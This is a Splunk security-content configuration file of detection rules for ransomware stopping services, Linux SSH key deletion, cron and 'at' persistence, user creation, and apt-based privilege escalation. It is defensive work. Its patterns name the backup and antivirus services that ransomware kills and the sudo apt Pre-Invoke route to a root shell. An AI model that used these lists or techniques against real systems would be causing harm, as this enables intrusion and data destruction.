action.escu.creation_date = 2021-06-04 action.escu.modification_date = 2021-06-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Known Services Killed by Ransomware - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Ransomware", "BlackMatter Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = Known services $Message$ terminated by a potential ransomware on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "Message", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Known Services Killed by Ransomware - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "BlackMatter Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects a suspicioous termination of known services killed by ransomware before encrypting files in a compromised machine. This technique is commonly seen in most of ransomware now a days to avoid exception error while accessing the targetted files it wants to encrypts because of the open handle of those services to the targetted file. 
action.notable.param.rule_title = Known Services Killed by Ransomware
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_system` EventCode=7036 Message IN ("*Volume Shadow Copy*","*VSS*", "*backup*", "*sophos*", "*sql*", "*memtas*", "*mepocs*", "*veeam*", "*svc$*", "DefWatch", "ccEvtMgr", "ccSetMgr", "SavRoam", "RTVscan", "QBFCService", "QBIDPService", "Intuit.QuickBooks.FCS", "QBCFMonitorService", "YooBackup", "YooIT", "*Veeam*", "PDVFSService", "BackupExecVSSProvider", "BackupExecAgentAccelerator", "BackupExec*", "WdBoot", "WdFilter", "WdNisDrv", "WdNisSvc", "WinDefend", "wscsvc", "Sense", "sppsvc", "SecurityHealthService") Message="*service entered the stopped state*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message dest Type | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `known_services_killed_by_ransomware_filter`

[ESCU - Linux Account Manipulation Of SSH Config and Keys - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects the deletion of SSH keys on a Linux machine. An attacker may delete or modify SSH keys to impair some security features or as defense evasion on a compromised Linux machine. This anomaly can also be a good indicator of malware trying to wipe or delete several files on a compromised host as part of its destructive payload, as the AcidRain malware does on Linux or router machines. This detection can be a good pivot to check what process and user tried to delete these types of files, which is not common and needs further investigation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects the deletion of SSH keys on a Linux machine. An attacker may delete or modify SSH keys to impair some security features or as defense evasion on a compromised Linux machine. This anomaly can also be a good indicator of malware trying to wipe or delete several files on a compromised host as part of its destructive payload, as the AcidRain malware does on Linux or router machines. This detection can be a good pivot to check what process and user tried to delete these types of files, which is not common and needs further investigation.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase.
action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Account Manipulation Of SSH Config and Keys - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AcidRain"]
action.risk = 1
action.risk.param._risk_message = SSH Config and keys are deleted on $dest$ by Process GUID - $process_guid$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Account Manipulation Of SSH Config and Keys - Rule
action.correlationsearch.annotations = {"analytic_story": ["AcidRain"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted AND Filesystem.file_path IN ("/etc/ssh/*", "~/.ssh/*") by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_account_manipulation_of_ssh_config_and_keys_filter`

[ESCU - Linux Add Files In Known Crontab Directories - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic aims to detect unauthorized activities through suspicious file creation in recognized cron table directories, prevalent Unix-based locations for scheduling tasks. This behavior is often exploited by nefarious entities like malware or threat actors, including red teamers, to establish persistence on a targeted or compromised host. The analogy to Windows-based scheduled tasks helps explain the utility of a crontab or cron job. To enhance clarity and actionable intelligence, the anomaly query flags the anomaly, urging further investigation into the added file's details. A cybersecurity analyst should consider additional data points such as the user identity involved, the file's nature and purpose, file origin, timestamp, and any changes in system behavior post file execution. This comprehensive understanding aids in accurately determining the file's legitimacy, facilitating prompt and effective response actions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic aims to detect unauthorized activities through suspicious file creation in recognized cron table directories, prevalent Unix-based locations for scheduling tasks. This behavior is often exploited by nefarious entities like malware or threat actors, including red teamers, to establish persistence on a targeted or compromised host. The analogy to Windows-based scheduled tasks helps explain the utility of a crontab or cron job. To enhance clarity and actionable intelligence, the anomaly query flags the anomaly, urging further investigation into the added file's details. A cybersecurity analyst should consider additional data points such as the user identity involved, the file's nature and purpose, file origin, timestamp, and any changes in system behavior post file execution. This comprehensive understanding aids in accurately determining the file's legitimacy, facilitating prompt and effective response actions.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase.
action.escu.known_false_positives = Administrator or network operator can create files in crontab folders for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2021-12-17
action.escu.modification_date = 2021-12-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Add Files In Known Crontab Directories - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"]
action.risk = 1
action.risk.param._risk_message = a file $file_name$ is created in $file_path$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Add Files In Known Crontab Directories - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/cron*", "*/var/spool/cron/*") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_add_files_in_known_crontab_directories_filter`

[ESCU - Linux Add User Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for commands to create user accounts on the Linux platform. This technique is commonly abused by adversaries, malware authors and red teamers to persist on the targeted or compromised host by creating a new user with elevated privileges. This hunting query may catch normal creation of users by administrators, so a filter is needed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for commands to create user accounts on the Linux platform. This technique is commonly abused by adversaries, malware authors and red teamers to persist on the targeted or compromised host by creating a new user with elevated privileges. This hunting query may catch normal creation of users by administrators, so a filter is needed.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2021-12-21
action.escu.modification_date = 2021-12-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Add User Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Add User Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("useradd", "adduser") OR Processes.process IN ("*useradd *", "*adduser *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_add_user_account_filter`

[ESCU - Linux Adding Crontab Using List Parameter - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies suspicious modifications to cron jobs on Linux systems using the crontab command with list parameters. This command line parameter can be abused by malware like Industroyer2, as well as adversaries and red teamers, to add a crontab entry for executing their malicious code on a schedule of their choice. However, it's important to note that administrators or normal users may also use this command for legitimate automation purposes, so filtering is required to minimize false positives. Identifying the modification of cron jobs using list parameters is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is detected, further investigation should be conducted to analyze the added cron job, its associated command, and the impact it may have on the system. This includes examining the purpose of the job, reviewing any on-disk artifacts, and identifying any related processes or activities occurring concurrently. The impact of a true positive can range from unauthorized execution of malicious code to data destruction or other damaging outcomes.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies suspicious modifications to cron jobs on Linux systems using the crontab command with list parameters. This command line parameter can be abused by malware like Industroyer2, as well as adversaries and red teamers, to add a crontab entry for executing their malicious code on a schedule of their choice. However, it's important to note that administrators or normal users may also use this command for legitimate automation purposes, so filtering is required to minimize false positives. Identifying the modification of cron jobs using list parameters is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is detected, further investigation should be conducted to analyze the added cron job, its associated command, and the impact it may have on the system. This includes examining the purpose of the job, reviewing any on-disk artifacts, and identifying any related processes or activities occurring concurrently. The impact of a true positive can range from unauthorized execution of malicious code to data destruction or other damaging outcomes.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Adding Crontab Using List Parameter - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Industroyer2", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Adding Crontab Using List Parameter - Rule
action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "crontab" Processes.process= "* -l*" by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_adding_crontab_using_list_parameter_filter`

[ESCU - Linux apt-get Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = apt-get is a command-line tool for interacting with the Advanced Package Tool (APT) library (a package management system for Linux distributions). It allows you to search for, install, manage, update, and remove software. The tool does not build software from the source code. If sudo rights are given to the tool for a user, then the user can run system commands as root and possibly get a root shell.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = apt-get is a command-line tool for interacting with the Advanced Package Tool (APT) library (a package management system for Linux distributions). It allows you to search for, install, manage, update, and remove software. The tool does not build software from the source code. If sudo rights are given to the tool for a user, then the user can run system commands as root and possibly get a root shell.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present, filter as needed.
action.escu.creation_date = 2022-08-11
action.escu.modification_date = 2022-08-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux apt-get Privilege Escalation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux apt-get Privilege Escalation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*apt-get*" AND Processes.process="*APT::Update::Pre-Invoke::*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_apt_get_privilege_escalation_filter` [ESCU - Linux APT Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Advanced Package Tool, more commonly known as APT, is a collection of tools used to install, update, remove, and otherwise manage software packages on Debian and its derivative operating systems, including Ubuntu and Linux Mint. If sudo right is given to the tool for user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Advanced Package Tool, more commonly known as APT, is a collection of tools used to install, update, remove, and otherwise manage software packages on Debian and its derivative operating systems, including Ubuntu and Linux Mint. If sudo right is given to the tool for user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. 
Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux APT Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux APT Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = 
auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*apt*" AND Processes.process="*APT::Update::Pre-Invoke::*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_apt_privilege_escalation_filter` [ESCU - Linux At Allow Config File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of suspicious configuration files, /etc/at.allow or /etc/at.deny, in Linux. These files are commonly abused by malware, adversaries, or red teamers to establish persistence on compromised hosts. The configuration files determine which users are allowed to execute the "at" application, which is used for scheduling tasks in Linux. Attackers can add their user or a compromised username to these files to execute malicious code using "at." It's important to consider potential false positives as administrators or network operators may create these files for legitimate automation purposes. Adjust the filter macros to minimize false positives.\ Identifying the creation of these configuration files is valuable for a SOC as it indicates potential unauthorized activities or an attacker attempting to establish persistence. If a true positive is found, further investigation is necessary to examine the contents of the created configuration file and determine the source of creation. 
The impact of a true positive can vary but could result in unauthorized execution of malicious code, data theft, or other detrimental consequences. Analysts should review the file path, creation time, and associated processes to assess the extent of the attack and initiate appropriate response actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation of suspicious configuration files, /etc/at.allow or /etc/at.deny, in Linux. These files are commonly abused by malware, adversaries, or red teamers to establish persistence on compromised hosts. The configuration files determine which users are allowed to execute the "at" application, which is used for scheduling tasks in Linux. Attackers can add their user or a compromised username to these files to execute malicious code using "at." It's important to consider potential false positives as administrators or network operators may create these files for legitimate automation purposes. Adjust the filter macros to minimize false positives.\ Identifying the creation of these configuration files is valuable for a SOC as it indicates potential unauthorized activities or an attacker attempting to establish persistence. If a true positive is found, further investigation is necessary to examine the contents of the created configuration file and determine the source of creation. The impact of a true positive can vary but could result in unauthorized execution of malicious code, data theft, or other detrimental consequences. Analysts should review the file path, creation time, and associated processes to assess the extent of the attack and initiate appropriate response actions. 
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints into the Endpoint datamodel. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can create this file for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-17 action.escu.modification_date = 2021-12-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux At Allow Config File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux At Allow Config File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = 
number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/at.allow", "*/etc/at.deny") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_at_allow_config_file_creation_filter` [ESCU - Linux At Application Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the execution of the "At" application in Linux, which can be used by attackers to create persistence entries on a compromised host. The "At" application can be used for automation purposes by administrators or network operators, so the filter macros should be updated to remove false positives. If a true positive is found, it suggests an attacker is trying to maintain access to the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the required fields from your endpoints into the Endpoint datamodel. When a true positive is detected, it suggests that an attacker is attempting to establish persistence or deliver additional malicious payloads by leveraging the "At" application. This behavior can lead to data theft, ransomware attacks, or other damaging outcomes.\ During triage, the SOC analyst should review the context surrounding the execution of the "At" application. This includes identifying the user, the parent process responsible for invoking the application, and the specific command-line arguments used. 
It is important to consider whether the execution is expected behavior by an administrator or network operator for legitimate automation purposes.\ The presence of "At" application execution may indicate an attacker's attempt to maintain unauthorized access to the environment. Immediate investigation and response are necessary to mitigate further risks, identify the attacker's intentions, and prevent potential harm to the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.002", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the execution of the "At" application in Linux, which can be used by attackers to create persistence entries on a compromised host. The "At" application can be used for automation purposes by administrators or network operators, so the filter macros should be updated to remove false positives. If a true positive is found, it suggests an attacker is trying to maintain access to the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the required fields from your endpoints into the Endpoint datamodel. When a true positive is detected, it suggests that an attacker is attempting to establish persistence or deliver additional malicious payloads by leveraging the "At" application. This behavior can lead to data theft, ransomware attacks, or other damaging outcomes.\ During triage, the SOC analyst should review the context surrounding the execution of the "At" application. This includes identifying the user, the parent process responsible for invoking the application, and the specific command-line arguments used. 
It is important to consider whether the execution is expected behavior by an administrator or network operator for legitimate automation purposes.\ The presence of "At" application execution may indicate an attacker's attempt to maintain unauthorized access to the environment. Immediate investigation and response are necessary to mitigate further risks, identify the attacker's intentions, and prevent potential harm to the organization. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. 
